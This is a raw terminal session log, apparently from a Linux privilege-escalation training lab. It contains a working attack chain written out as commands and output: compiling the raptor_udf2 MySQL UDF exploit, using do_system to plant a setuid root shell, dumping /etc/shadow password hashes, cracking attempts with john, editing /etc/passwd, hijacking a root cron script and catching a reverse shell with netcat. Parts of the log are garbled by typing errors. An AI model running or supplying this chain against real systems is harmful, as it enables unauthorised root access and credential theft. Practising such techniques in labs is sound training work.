16700:43:01.860901 IP (tos 0x0, ttl 64, id 24560, offset 0, flags [DF], proto TCP (6), length 62695)
168 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xfdf1), seq 26747530:26810173, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 62643: HTTP
16900:43:01.861149 IP (tos 0x0, ttl 64, id 24567, offset 0, flags [DF], proto TCP (6), length 2896)
170 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe4c3), seq 26810173:26813017, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 2844: HTTP
17100:43:01.861301 IP (tos 0x0, ttl 64, id 24678, offset 0, flags [DF], proto TCP (6), length 52)
172 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x9dad (correct), seq 11104, ack 26801224, win 6071, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
17300:43:01.861365 IP (tos 0x0, ttl 64, id 24679, offset 0, flags [DF], proto TCP (6), length 52)
174 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe0 (correct), seq 11104, ack 26813017, win 6003, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
17500:43:01.862496 IP (tos 0x0, ttl 64, id 24568, offset 0, flags [DF], proto TCP (6), length 57210)
176 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8a56 (incorrect -> 0x8614), seq 26813017:26870175, ack 11104, win 482, options [nop,nop,TS val 997088046 ecr 3431984584], length 57158: HTTP
177^Cssh user@10.10.170.166
178
179
180
181
182
183Owner@DESKTOP-8DUSIOO ~
184$ ssh user@10.10.170.166
185ssh: connect to host 10.10.170.166 port 22: Connection timed out
186
187Owner@DESKTOP-8DUSIOO ~
188$ ssh 10.10.170.166
189The authenticity of host '10.10.170.166 (10.10.170.166)' can't be esta
190blished.
191RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjkt
192Ank.
193Are you sure you want to continue connecting (yes/no)? yes
194Warning: Permanently added '10.10.170.166' (RSA) to the list of known
195Owner@DESKTOP-8DUSIOO ~
196$ ssh 10.10.170.166
197The authenticity of host '10.10.170.166 (10.10.170.166)' can't be established.
198RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjktAnk.
199Are you sure you want to continue connecting (yes/no)? yes
200Warning: Permanently added '10.10.170.166' (RSA) to the list of known hosts.
201owner@10.10.170.166's password:
202Permission denied, please try again.
203owner@10.10.170.166's password:
204Permission denied, please try again.
205owner@10.10.170.166's password:
206$ ssh 10.10.170.1666K0s
207Owner@DESKTOP-8DUSIOO ~ostname 10.10.170.166:22: No such host is known
208$ ssh 10.10.170.1666K0ssh: Could not resolve hostn
209ame 10.10.170.166:22: No such host is known.
210Owner@DESKTOP-8DUSIOO ~
211Owner@DESKTOP-8DUSIOO ~6 22
212$ 6 22
213ser@10user@10.10.170.166's passwor
214d:
215bash: 22: command not found
216Owner@DESKTOP-8DUSIOO ~
217Owner@DESKTOP-8DUSIOO ~6 22
218$ 6 220.10.170.1
21966's puser@10.10.170.166's password:
220owner@10.10.170.166's password:
221user@10.10.170.166's password:
222Owner@DESKTOP-8DUSIOO ~ound
223$ ssh 10.10.Ku
224Owner@DESKTOP- ~
225Owner@DESKTOP-8DUSIOO ~
226$ ssh user@10.10.170.166 22
227user@10.10.170.166's password:
228bash: 22: command not found
229bash: 22: command not found
230Owner@DESKTOP-8DUSIOO ~
231$ ssh user@10.10.170.166
232$ 6 22 [-E log_file] user@10.10.170.166's configfile] [-I pkcs11]
233password:
234Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
235
236The programs included with the Debian GNU/Linux system are free software;
237the exact distribution terms for each program are described in the
238individual files in /usr/share/doc/*/copyright.
239
240Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
241permitted by applicable law.
242Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
243user@debian:~$ id
244uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plug
245dev)
246user@debian:~$ ls
247myvpn.ovpn tools
248user@debian:~$ cd tools/
249user@debian:~/tools$ ls
250kernel-exploits mysql-udf nginx privesc-scripts sudo suid
251user@debian:~/tools$ cd mysql-udf/
252user@debian:~/tools/mysql-udf$ ls
253raptor_udf2.c
254user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
255user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o raptor_udf2.so raptor_udf2
256.o -lc
257top - 20:04:48 up 11 min, 1 user, load average: 0.00, 0.07, 0.08
258Tasks: 83 total, 1 running, 82 sleeping, 0 stopped, 0 zombie
259Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
260Mem: 507168k total, 498240k used, 8928k free, 382220k buffers
261Swap: 901112k total, 0k used, 901112k free, 54236k cached
262
263 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
264 1 root 20 0 8396 812 680 S 0.0 0.2 0:01.06 init
265 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
266 3 root RT 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
267 4 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
268 5 root RT 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0
269 6 root 20 0 0 0 0 S 0.0 0.0 0:00.01 events/0
270 7 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuset
271 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khelper
272 9 root 20 0 0 0 0 S 0.0 0.0 0:00.00 netns
273 10 root 20 0 0 0 0 S 0.0 0.0 0:00.00 async/mgr
274 11 root 20 0 0 0 0 S 0.0 0.0 0:00.00 pm
275 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenwatch
276 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenbus
277 14 root 20 0 0 0 0 S 0.0 0.0 0:00.00 sync_supers
278 15 root 20 0 0 0 0 S 0.0 0.0 0:00.00 bdi-default
279 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kintegrityd/0
280 17 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kblockd/0
281 18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpid
282 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_notify
283 20 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_hotplug
284 21 root 20 0 0 0 0 S 0.0 0.0 0:00.06 kseriod
285 23 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kondemand/0
286 24 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khungtaskd
287 25 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kswapd0
288 26 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd
289 27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 aio/0
290 28 root 20 0 0 0 0 S 0.0 0.0 0:00.00 crypto/0
291 165 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata/0
292 166 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata_aux
293 167 root 20 0 0 0 0 S 0.0 0.0 0:00.00 scsi_eh_0
294 168 root 20 0 0 0 0 S 0.0 0.0 0:00.01 scsi_eh_1
295 198 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kjournald
296 240 root 20 0 0 0 0 S 0.0 0.0 0:00.00 flush-202:0
297 275 root 16 -4 16784 796 380 S 0.0 0.2 0:00.34 udevd
298 425 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kpsmoused
299 932 root 18 -2 16780 720 308 S 0.0 0.1 0:00.00 udevd
300 933 root 18 -2 16780 648 236 S 0.0 0.1 0:00.00 udevd
301 1249 root 20 0 6796 756 284 S 0.0 0.1 0:00.03 dhclient
302 1279 daemon 20 0 8136 532 408 S 0.0 0.1 0:00.00 portmap
303 1311 statd 20 0 14424 896 732 S 0.0 0.2 0:00.00 rpc.statd
304 1314 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rpciod/0
305 1316 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd000
306 1317 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd001
307 1318 root 20 0 0 0 0 S 0.0 0.0 0:00.00 nfsiod
308 1325 root 20 0 27064 588 372 S 0.0 0.1 0:00.00 rpc.idmapd
309 1562 root 20 0 54336 1656 1084 S 0.0 0.3 0:00.08 rsyslogd
310 1638 root 20 0 3960 644 504 S 0.0 0.1 0:00.00 acpid
311 1672 root 20 0 71424 2896 1476 S 0.0 0.6 0:00.01 apache2
312 1675 www-data 20 0 71156 1992 596 S 0.0 0.4 0:00.00 apache2
313 1676 www-data 20 0 287m 2628 984 S 0.0 0.5 0:00.00 apache2
314 1677 www-data 20 0 287m 2644 996 S 0.0 0.5 0:00.00 apache2
315 1818 root 20 0 22468 1068 824 S 0.0 0.2 0:00.00 cron
316user@debian:~/tools/mysql-udf$ use mysql;
317-bash: use: command not found
318user@debian:~/tools/mysql-udf$ mysql -u root
319Welcome to the MySQL monitor. Commands end with ; or \g.
320Your MySQL connection id is 36
321Server version: 5.1.73-1+deb6u1 (Debian)
322
323Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
324
325Oracle is a registered trademark of Oracle Corporation and/or its
326affiliates. Other names may be trademarks of their respective
327owners.
328
329Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
330
331mysql> use mysql;
332Reading table information for completion of table and column names
333You can turn off this feature to get a quicker startup with -A
334
335Database changed
336mysql> create table foo(line blob);
337Query OK, 0 rows affected (0.00 sec)
338
339mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
340Query OK, 1 row affected (0.00 sec)
341
342mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
343Query OK, 1 row affected (0.00 sec)
344
345mysql> create function do_system returns integer soname 'raptor_udf2.so';
346Query OK, 0 rows affected (0.00 sec)
347
348mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
349+------------------------------------------------------------------+
350| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
351+------------------------------------------------------------------+
352| 0 |
353+------------------------------------------------------------------+
3541 row in set (0.00 sec)
355
356mysql> /q
357 -> exit
358 -> /quit
359 -> ^CCtrl-C -- exit!
360Aborted
361user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
362rootbash-4.1# id
363uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30
364(dip),44(video),46(plugdev),1000(user)
365rootbash-4.1# cat /etc/shadow
366root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
36717298:0:99999:7:::
368daemon:*:17298:0:99999:7:::
369bin:*:17298:0:99999:7:::
370sys:*:17298:0:99999:7:::
371sync:*:17298:0:99999:7:::
372games:*:17298:0:99999:7:::
373man:*:17298:0:99999:7:::
374lp:*:17298:0:99999:7:::
375mail:*:17298:0:99999:7:::
376news:*:17298:0:99999:7:::
377uucp:*:17298:0:99999:7:::
378proxy:*:17298:0:99999:7:::
379www-data:*:17298:0:99999:7:::
380backup:*:17298:0:99999:7:::
381list:*:17298:0:99999:7:::
382irc:*:17298:0:99999:7:::
383gnats:*:17298:0:99999:7:::
384nobody:*:17298:0:99999:7:::
385libuuid:!:17298:0:99999:7:::
386Debian-exim:!:17298:0:99999:7:::
387sshd:*:17298:0:99999:7:::
388user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
38917298:0:99999:7:::
390statd:*:17299:0:99999:7:::
391mysql:!:18133:0:99999:7:::
392rootbash-4.1# cat /etc/passwd
393root:x:0:0:root:/root:/bin/bash
394daemon:x:1:1:daemon:/usr/sbin:/bin/sh
395bin:x:2:2:bin:/bin:/bin/sh
396sys:x:3:3:sys:/dev:/bin/sh
397sync:x:4:65534:sync:/bin:/bin/sync
398games:x:5:60:games:/usr/games:/bin/sh
399man:x:6:12:man:/var/cache/man:/bin/sh
400lp:x:7:7:lp:/var/spool/lpd:/bin/sh
401mail:x:8:8:mail:/var/mail:/bin/sh
402news:x:9:9:news:/var/spool/news:/bin/sh
403uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
404proxy:x:13:13:proxy:/bin:/bin/sh
405www-data:x:33:33:www-data:/var/www:/bin/sh
406backup:x:34:34:backup:/var/backups:/bin/sh
407list:x:38:38:Mailing List Manager:/var/list:/bin/sh
408irc:x:39:39:ircd:/var/run/ircd:/bin/sh
409gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
410nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
411libuuid:x:100:101::/var/lib/libuuid:/bin/sh
412Debian-exim:x:101:103::/var/spool/exim4:/bin/false
413sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
414user:x:1000:1000:user,,,:/home/user:/bin/bash
415statd:x:103:65534::/var/lib/nfs:/bin/false
416mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
417rootbash-4.1# cat /etc/hosts
418127.0.0.1 localhost
419127.0.1.1 debian.localdomain debian
420
421# The following lines are desirable for IPv6 capable hosts
422::1 ip6-localhost ip6-loopback
423fe00::0 ip6-localnet
424ff00::0 ip6-mcastprefix
425ff02::1 ip6-allnodes
426ff02::2 ip6-allrouters
427rootbash-4.1# ls -l /etc/shadow
428-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
429rootbash-4.1# cat /etc/shadow
430root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
43117298:0:99999:7:::
432daemon:*:17298:0:99999:7:::
433bin:*:17298:0:99999:7:::
434sys:*:17298:0:99999:7:::
435sync:*:17298:0:99999:7:::
436games:*:17298:0:99999:7:::
437man:*:17298:0:99999:7:::
438lp:*:17298:0:99999:7:::
439mail:*:17298:0:99999:7:::
440news:*:17298:0:99999:7:::
441uucp:*:17298:0:99999:7:::
442proxy:*:17298:0:99999:7:::
443www-data:*:17298:0:99999:7:::
444backup:*:17298:0:99999:7:::
445list:*:17298:0:99999:7:::
446irc:*:17298:0:99999:7:::
447gnats:*:17298:0:99999:7:::
448nobody:*:17298:0:99999:7:::
449libuuid:!:17298:0:99999:7:::
450Debian-exim:!:17298:0:99999:7:::
451sshd:*:17298:0:99999:7:::
452user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
45317298:0:99999:7:::
454statd:*:17299:0:99999:7:::
455mysql:!:18133:0:99999:7:::
456rootbash-4.1# wget
457wget: missing URL
458Usage: wget [OPTION]... [URL]...
459
460Try ‘wget --help’ for more options.
461rootbash-4.1# pwd
462/home/user/tools/mysql-udf
463rootbash-4.1# ls
464raptor_udf2.c raptor_udf2.o raptor_udf2.so
465rootbash-4.1# cd ..
466rootbash-4.1# ls
467kernel-exploits mysql-udf nginx privesc-scripts sudo suid
468rootbash-4.1# cd ..
469rootbash-4.1# ls
470myvpn.ovpn tools
471rootbash-4.1# cd tools/
472rootbash-4.1# ls
473kernel-exploits mysql-udf nginx privesc-scripts sudo suid
474rootbash-4.1# cd privesc-scripts/
475rootbash-4.1# ls
476LinEnum.sh linpeas.sh lse.sh
477rootbash-4.1# john --wordlist =/usr/share/wordlists/rockyou.txt hash.txt
478login as: user
479user@10.10.170.166's password:
480Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
481
482The programs included with the Debian GNU/Linux system are free software;
483the exact distribution terms for each program are described in the
484individual files in /usr/share/doc/*/copyright.
485
486Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
487permitted by applicable law.
488Last login: Sun Jan 17 21:12:02 2021 from ip-10-9-252-16.eu-west-1.compute.inter nal
489user@debian:~$ cd /home/user/tools/mysql.udf
490-bash: cd: /home/user/tools/mysql.udf: No such file or directory
491user@debian:~$ ls
492myvpn.ovpn tools
493user@debian:~$ cd tools/
494user@debian:~/tools$ ls
495kernel-exploits mysql-udf nginx privesc-scripts sudo suid
496user@debian:~/tools$ gcc -g -c raptor_udf2.c -fPIC
497gcc: raptor_udf2.c: No such file or directory
498gcc: no input files
499user@debian:~/tools$ cd mysql-udf/
500user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
501user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -1c
502gcc: unrecognized option '-soname,'
503gcc: unrecognized option '-1c'
504user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -lc
505gcc: unrecognized option '-soname,'
506user@debian:~/tools/mysql-udf$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o rapt or_udf2.so raptor_udf2.o -lc
507user@debian:~/tools/mysql-udf$ mysql -u root
508Welcome to the MySQL monitor. Commands end with ; or \g.
509Your MySQL connection id is 37
510Server version: 5.1.73-1+deb6u1 (Debian)
511
512Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
513
514Oracle is a registered trademark of Oracle Corporation and/or its
515affiliates. Other names may be trademarks of their respective
516owners.
517
518Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
519
520mysql> use mysql;
521Reading table information for completion of table and column names
522You can turn off this feature to get a quicker startup with -A
523
524Database changed
525mysql> create table bmillakid(line blob);
526Query OK, 0 rows affected (0.00 sec)
527
528mysql> insert into bmillakid values(load_file('home/usr/tools/mysql-udf/raptor_u df2.so' ));
529Query OK, 1 row affected (0.00 sec)
530
531mysql> select * from bmillakid into dumpfile '/usr/lib/mysql/plugin/raptor_udf2. so';
532ERROR 1086 (HY000): File '/usr/lib/mysql/plugin/raptor_udf2.so' already exists
533mysql> exit
534Bye
535user@debian:~/tools/mysql-udf$ who am i
536user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
537user@debian:~/tools/mysql-udf$ links
538-bash: links: command not found
539user@debian:~/tools/mysql-udf$ lynx
540-bash: lynx: command not found
541user@debian:~/tools/mysql-udf$ wget
542wget: missing URL
543Usage: wget [OPTION]... [URL]...
544
545Try ‘wget --help’ for more options.
546user@debian:~/tools/mysql-udf$ cat /etc/shadow
547root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
548daemon:*:17298:0:99999:7:::
549bin:*:17298:0:99999:7:::
550sys:*:17298:0:99999:7:::
551sync:*:17298:0:99999:7:::
552games:*:17298:0:99999:7:::
553man:*:17298:0:99999:7:::
554lp:*:17298:0:99999:7:::
555mail:*:17298:0:99999:7:::
556news:*:17298:0:99999:7:::
557uucp:*:17298:0:99999:7:::
558proxy:*:17298:0:99999:7:::
559www-data:*:17298:0:99999:7:::
560backup:*:17298:0:99999:7:::
561list:*:17298:0:99999:7:::
562irc:*:17298:0:99999:7:::
563gnats:*:17298:0:99999:7:::
564nobody:*:17298:0:99999:7:::
565libuuid:!:17298:0:99999:7:::
566Debian-exim:!:17298:0:99999:7:::
567sshd:*:17298:0:99999:7:::
568user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjw YpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
569statd:*:17299:0:99999:7:::
570mysql:!:18133:0:99999:7:::
571bmillakid:!:18645:0:99999:7:::
572user@debian:~/tools/mysql-udf$ cat /etc/passwd
573root:x:0:0:root:/root:/bin/bash
574daemon:x:1:1:daemon:/usr/sbin:/bin/sh
575bin:x:2:2:bin:/bin:/bin/sh
576sys:x:3:3:sys:/dev:/bin/sh
577sync:x:4:65534:sync:/bin:/bin/sync
578games:x:5:60:games:/usr/games:/bin/sh
579man:x:6:12:man:/var/cache/man:/bin/sh
580lp:x:7:7:lp:/var/spool/lpd:/bin/sh
581mail:x:8:8:mail:/var/mail:/bin/sh
582news:x:9:9:news:/var/spool/news:/bin/sh
583uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
584proxy:x:13:13:proxy:/bin:/bin/sh
585www-data:x:33:33:www-data:/var/www:/bin/sh
586backup:x:34:34:backup:/var/backups:/bin/sh
587list:x:38:38:Mailing List Manager:/var/list:/bin/sh
588irc:x:39:39:ircd:/var/run/ircd:/bin/sh
589gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
590nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
591libuuid:x:100:101::/var/lib/libuuid:/bin/sh
592Debian-exim:x:101:103::/var/spool/exim4:/bin/false
593sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
594user:x:1000:1000:user,,,:/home/user:/bin/bash
595statd:x:103:65534::/var/lib/nfs:/bin/false
596mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
597bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
598user@debian:~/tools/mysql-udf$ ls -la user
599ls: cannot access user: No such file or directory
600user@debian:~/tools/mysql-udf$ pwd
601/home/user/tools/mysql-udf
602user@debian:~/tools/mysql-udf$ who am i
603user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
604user@debian:~/tools/mysql-udf$ whoami
605user
606user@debian:~/tools/mysql-udf$ ls -la /
607total 96
608drwxr-xr-x 22 root root 4096 Aug 25 2019 .
609drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
610drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
611drwxr-xr-x 3 root root 4096 May 12 2017 boot
612drwxr-xr-x 12 root root 2820 Jan 17 19:55 dev
613drwxr-xr-x 67 root root 4096 Jan 17 21:16 etc
614drwxr-xr-x 3 root root 4096 May 15 2017 home
615lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32- 5-amd64
616drwxr-xr-x 12 root root 12288 May 14 2017 lib
617lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
618drwx------ 2 root root 16384 May 12 2017 lost+found
619drwxr-xr-x 3 root root 4096 May 12 2017 media
620drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
621drwxr-xr-x 2 root root 4096 May 12 2017 opt
622dr-xr-xr-x 96 root root 0 Jan 17 19:53 proc
623drwx------ 5 root root 4096 May 15 2020 root
624drwxr-xr-x 2 root root 4096 May 13 2017 sbin
625drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
626drwxr-xr-x 2 root root 4096 May 12 2017 srv
627drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
628drwxr-xr-x 13 root root 0 Jan 17 19:53 sys
629drwxrwxrwt 2 root root 4096 Jan 17 21:19 tmp
630drwxr-xr-x 11 root root 4096 May 13 2017 usr
631drwxr-xr-x 14 root root 4096 May 13 2017 var
632lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd6 4
633user@debian:~/tools/mysql-udf$ whoami
634user
635user@debian:~/tools/mysql-udf$ sudo -l
636Matching Defaults entries for user on this host:
637 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
638
639User user may run the following commands on this host:
640 (root) NOPASSWD: /usr/sbin/iftop
641 (root) NOPASSWD: /usr/bin/find
642 (root) NOPASSWD: /usr/bin/nano
643 (root) NOPASSWD: /usr/bin/vim
644 (root) NOPASSWD: /usr/bin/man
645 (root) NOPASSWD: /usr/bin/awk
646 (root) NOPASSWD: /usr/bin/less
647 (root) NOPASSWD: /usr/bin/ftp
648 (root) NOPASSWD: /usr/bin/nmap
649 (root) NOPASSWD: /usr/sbin/apache2
650 (root) NOPASSWD: /bin/more
651user@debian:~/tools/mysql-udf$ cat /etc/shadow | grep root
652root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
653user@debian:~/tools/mysql-udf$ ls -l /etc/passwd
654-rw-r--r-- 1 root root 1056 Jan 17 20:33 /etc/passwd
655user@debian:~/tools/mysql-udf$ openssl passwd l33th4x0rbr0!
656Warning: truncating password to 8 characters
6575v3Bvw7Nf6Zbs
658user@debian:~/tools/mysql-udf$
659user@debian:~/tools/mysql-udf$ 5v3Bvw7Nf6Zbs
660-bash: 5v3Bvw7Nf6Zbs: command not found
661user@debian:~/tools/mysql-udf$ nano /etc/passwd
662user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
663rootbash-4.1# su newroot
664Unknown id: newroot
665rootbash-4.1# whoami
666root
667rootbash-4.1# cat /etc/passwd
668root:x:0:0:root:/root:/bin/bash
669daemon:x:1:1:daemon:/usr/sbin:/bin/sh
670bin:x:2:2:bin:/bin:/bin/sh
671sys:x:3:3:sys:/dev:/bin/sh
672sync:x:4:65534:sync:/bin:/bin/sync
673games:x:5:60:games:/usr/games:/bin/sh
674man:x:6:12:man:/var/cache/man:/bin/sh
675lp:x:7:7:lp:/var/spool/lpd:/bin/sh
676mail:x:8:8:mail:/var/mail:/bin/sh
677news:x:9:9:news:/var/spool/news:/bin/sh
678uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
679proxy:x:13:13:proxy:/bin:/bin/sh
680www-data:x:33:33:www-data:/var/www:/bin/sh
681backup:x:34:34:backup:/var/backups:/bin/sh
682list:x:38:38:Mailing List Manager:/var/list:/bin/sh
683irc:x:39:39:ircd:/var/run/ircd:/bin/sh
684gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
685nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
686libuuid:x:100:101::/var/lib/libuuid:/bin/sh
687Debian-exim:x:101:103::/var/spool/exim4:/bin/false
688sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
689user:x:1000:1000:user,,,:/home/user:/bin/bash
690statd:x:103:65534::/var/lib/nfs:/bin/false
691mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
692bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
693rootbash-4.1# su root
694Password:
695su: Authentication failure
696rootbash-4.1# exit
697exit
698user@debian:~/tools/mysql-udf$ sudo -l
699Matching Defaults entries for user on this host:
700 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
701
702User user may run the following commands on this host:
703 (root) NOPASSWD: /usr/sbin/iftop
704 (root) NOPASSWD: /usr/bin/find
705 (root) NOPASSWD: /usr/bin/nano
706 (root) NOPASSWD: /usr/bin/vim
707 (root) NOPASSWD: /usr/bin/man
708 (root) NOPASSWD: /usr/bin/awk
709 (root) NOPASSWD: /usr/bin/less
710 (root) NOPASSWD: /usr/bin/ftp
711 (root) NOPASSWD: /usr/bin/nmap
712 (root) NOPASSWD: /usr/sbin/apache2
713 (root) NOPASSWD: /bin/more
714user@debian:~/tools/mysql-udf$ cat /etc/crontab
715# /etc/crontab: system-wide crontab
716# Unlike any other crontab you don't have to run the `crontab'
717# command to install the new version when you edit this file
718# and files in /etc/cron.d. These files also have username fields,
719# that none of the other crontabs do.
720
721SHELL=/bin/sh
722PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
723
724# m h dom mon dow user command
72517 * * * * root cd / && run-parts --report /etc/cron.hourly
72625 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
72747 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
72852 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
729#
730* * * * * root overwrite.sh
731* * * * * root /usr/local/bin/compress.sh
732
733user@debian:~/tools/mysql-udf$ locate overwrite.sh
734locate: warning: database `/var/cache/locate/locatedb' is more than 8 days old (actual age is 247.7 days)
735/usr/local/bin/overwrite.sh
736user@debian:~/tools/mysql-udf$ ls -l /usr/local/bin/overwrite.sh
737-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
738user@debian:~/tools/mysql-udf$ cd /usr/local/bin/
739user@debian:/usr/local/bin$ ls
740compress.sh overwrite.sh suid-env suid-env2 suid-so
741user@debian:/usr/local/bin$ cat overwrite.sh
742#!/bin/bash
743
744echo `date` > /tmp/useless
745user@debian:/usr/local/bin$ nano overwrite.sh
746user@debian:/usr/local/bin$ nc -nvlp 4444
747listening on [any] 4444 ...
748connect to [10.10.170.166] from (UNKNOWN) [10.10.170.166] 37728
749allexport off
750braceexpand on
751emacs on
752errexit off
753errtrace off
754functrace off
755hashall on
